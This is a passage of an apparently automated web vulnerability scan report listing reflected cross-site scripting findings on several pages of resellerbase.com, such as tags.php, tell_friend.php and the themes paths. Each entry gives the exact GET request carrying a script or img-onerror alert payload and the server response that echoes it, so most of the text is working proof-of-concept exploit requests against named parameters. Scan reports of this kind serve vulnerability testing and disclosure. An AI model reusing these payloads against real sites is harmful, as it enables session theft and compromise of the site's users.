Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php61c15<script>alert(1)</script>74aeb8166dc&ltr=X was not found on this server.</p>
...[SNIP]...

2.4746. http://www.resellerbase.com/tags.php<r=X [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=X

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60e79<script>alert(1)</script>01de3505404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=X?60e79<script>alert(1)</script>01de3505404=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=X?60e79<script>alert(1)</script>01de3505404=1 was not found on this server.</p>
...[SNIP]...

2.4747. http://www.resellerbase.com/tags.php<r=Y [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=Y

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a991b<script>alert(1)</script>30deb712985 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa991b<script>alert(1)</script>30deb712985&ltr=Y HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa991b<script>alert(1)</script>30deb712985&ltr=Y was not found on this server.</p>
...[SNIP]...

2.4748. http://www.resellerbase.com/tags.php<r=Y [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=Y

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5ecf<script>alert(1)</script>bc3a5f7dbbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=Y?a5ecf<script>alert(1)</script>bc3a5f7dbbb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=Y?a5ecf<script>alert(1)</script>bc3a5f7dbbb=1 was not found on this server.</p>
...[SNIP]...

2.4749. http://www.resellerbase.com/tags.php<r=Z [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=Z

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88e74<script>alert(1)</script>327338d7f0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php88e74<script>alert(1)</script>327338d7f0f&ltr=Z HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php88e74<script>alert(1)</script>327338d7f0f&ltr=Z was not found on this server.</p>
...[SNIP]...

2.4750. http://www.resellerbase.com/tags.php<r=Z [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=Z

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38ecc<script>alert(1)</script>29f298f06c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=Z?38ecc<script>alert(1)</script>29f298f06c4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=Z?38ecc<script>alert(1)</script>29f298f06c4=1 was not found on this server.</p>
...[SNIP]...

2.4751. http://www.resellerbase.com/tell_friend.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd7d8<script>alert(1)</script>25be0f5e43e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tell_friend.phpfd7d8<script>alert(1)</script>25be0f5e43e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tell_friend.phpfd7d8<script>alert(1)</script>25be0f5e43e was not found on this server.</p>
...[SNIP]...

2.4752. http://www.resellerbase.com/tell_friend.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31dab<script>alert(1)</script>7d835201c987dc901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php31dab<script>alert(1)</script>7d835201c987dc901?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tell_friend.php31dab<script>alert(1)</script>7d835201c987dc901?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com was not found on this server.</p>
...[SNIP]...

2.4753. http://www.resellerbase.com/tell_friend.php [friend_email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of the friend_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b216"><img%20src%3da%20onerror%3dalert(1)>83f3a7e868dbe4f2a was submitted in the friend_email parameter. This input was echoed as 4b216"><img src=a onerror=alert(1)>83f3a7e868dbe4f2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com4b216"><img%20src%3da%20onerror%3dalert(1)>83f3a7e868dbe4f2a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="friend_email" value="wiener@example.com4b216"><img src=a onerror=alert(1)>83f3a7e868dbe4f2a" />
...[SNIP]...

2.4754. http://www.resellerbase.com/tell_friend.php [friend_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of the friend_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23961"><img%20src%3da%20onerror%3dalert(1)>896342a7ab9fe7299 was submitted in the friend_name parameter. This input was echoed as 23961"><img src=a onerror=alert(1)>896342a7ab9fe7299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener23961"><img%20src%3da%20onerror%3dalert(1)>896342a7ab9fe7299&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="friend_name" value="Peter Wiener23961"><img src=a onerror=alert(1)>896342a7ab9fe7299" />
...[SNIP]...

2.4755. http://www.resellerbase.com/tell_friend.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50a4"><img%20src%3da%20onerror%3dalert(1)>ab291645ea527fdd0 was submitted in the id parameter. This input was echoed as d50a4\"><img src=a onerror=alert(1)>ab291645ea527fdd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?id=d50a4"><img%20src%3da%20onerror%3dalert(1)>ab291645ea527fdd0&captcha_key=555-555-0199@example.com&my_email=wiener@example.com&fav=&pflag=tf&friend_name=Peter+Wiener&submit=Tell+My+Friend&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tell_friend.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input type="hidden" name="id" value="d50a4\"><img src=a onerror=alert(1)>ab291645ea527fdd0" />
...[SNIP]...

2.4756. http://www.resellerbase.com/tell_friend.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cef"><img%20src%3da%20onerror%3dalert(1)>285a81b19a7 was submitted in the id parameter. This input was echoed as c0cef\"><img src=a onerror=alert(1)>285a81b19a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tell_friend.php?id=12c0cef"><img%20src%3da%20onerror%3dalert(1)>285a81b19a7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=6
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input type="hidden" name="id" value="12c0cef\"><img src=a onerror=alert(1)>285a81b19a7" />
...[SNIP]...

2.4757. http://www.resellerbase.com/tell_friend.php [my_email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of the my_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d504"><img%20src%3da%20onerror%3dalert(1)>f66ce25d17c69f162 was submitted in the my_email parameter. This input was echoed as 9d504"><img src=a onerror=alert(1)>f66ce25d17c69f162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com9d504"><img%20src%3da%20onerror%3dalert(1)>f66ce25d17c69f162&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="my_email" value="wiener@example.com9d504"><img src=a onerror=alert(1)>f66ce25d17c69f162" />
...[SNIP]...

2.4758. http://www.resellerbase.com/tell_friend.php [my_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The value of the my_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a82a7"><img%20src%3da%20onerror%3dalert(1)>0b73c488f438d0edb was submitted in the my_name parameter. This input was echoed as a82a7"><img src=a onerror=alert(1)>0b73c488f438d0edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wienera82a7"><img%20src%3da%20onerror%3dalert(1)>0b73c488f438d0edb&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="my_name" value="Peter Wienera82a7"><img src=a onerror=alert(1)>0b73c488f438d0edb" />
...[SNIP]...

2.4759. http://www.resellerbase.com/tell_friend.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cc40<script>alert(1)</script>0659971a97d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tell_friend.php8cc40<script>alert(1)</script>0659971a97d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tell_friend.php8cc40<script>alert(1)</script>0659971a97d/ was not found on this server.</p>
...[SNIP]...

2.4760. http://www.resellerbase.com/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b50e<script>alert(1)</script>83b72daf045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes2b50e<script>alert(1)</script>83b72daf045/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes2b50e<script>alert(1)</script>83b72daf045/ was not found on this server.</p>
...[SNIP]...

2.4761. http://www.resellerbase.com/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1027c<script>alert(1)</script>2d82de75ff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes1027c<script>alert(1)</script>2d82de75ff7/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes1027c<script>alert(1)</script>2d82de75ff7/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4762. http://www.resellerbase.com/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9072c<script>alert(1)</script>a0e90cce9a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos9072c<script>alert(1)</script>a0e90cce9a4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos9072c<script>alert(1)</script>a0e90cce9a4/ was not found on this server.</p>
...[SNIP]...

2.4763. http://www.resellerbase.com/themes/kosmos/ajax.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/ajax.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 59a7b<script>alert(1)</script>9390b182871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes59a7b<script>alert(1)</script>9390b182871/kosmos/ajax.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

